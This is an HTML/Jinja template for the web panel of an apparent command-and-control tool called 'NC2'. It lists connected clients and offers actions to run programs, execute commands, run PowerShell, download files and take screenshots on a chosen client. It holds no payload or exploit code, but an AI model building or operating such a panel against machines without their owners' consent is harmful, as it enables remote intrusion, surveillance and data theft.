<!DOCTYPE HTML>

<html>
    <head>
        <title>NC2 - {{ numClients }} Clients connected</title>
        <style>
            footer {
				position: fixed;
				left: 0;
				bottom: 0;
				width: 100%;
				background: rgba(0, 0, 0, 0.7);
				color: white;
				text-align: center;
				padding: 10px 0;
			}
        </style>
    </head>
    <body>
        {% with messages = get_flashed_messages() %}
            {% if messages %}
            <ul>
                {% for message in messages %}
                <li>{{ message }}</li>
                {% endfor %}
            </ul>
            {% endif %}
        {% endwith %}
        {{ clients }}
        <br><br>
        <form method="post">
            <label for="jtw">Select Client:</label>
            <input type="text" id="jwt" name="jwt" list="userlist">
            <datalist id="jwtlist">
                {% for jwt in jwts %}
                <option value="{{ jwt }}">{{ jwt }}</option>
                {% endfor %}
            </datalist>
            <br><br>
            Action type:
            <br><br>
            <input type="radio" name="action" value="runapp" {% if action == 'runapp' %}checked{% endif %}>
            <label for="runapp">Run application</label><br>
            <input type="radio" name="action" value="execute" {% if action == 'execute' %}checked{% endif %}>
            <label for="execute">Execute</label><br>
            <input type="radio" name="action" value="ps" {% if action == 'ps' %}checked{% endif %}>
            <label for="ps">Power shell</label><br>
            <input type="radio" name="action" value="download" {% if action == 'download' %}checked{% endif %}>
            <label for="download">Download</label><br>
            <input type="radio" name="action" value="screenshot" {% if action == 'screenshot' %}checked{% endif %}>
            <label for="screenshot">Screenshot</label><br>
            <br><br>
            Arguments to run:
            <input type="text" name="arguments">
            <input type="submit">
        </form>
    </body>
    <footer>
        <a href="/overview" style="color: white; font-weight: bold; text-decoration: none;">Back</a>
    </footer>
</html>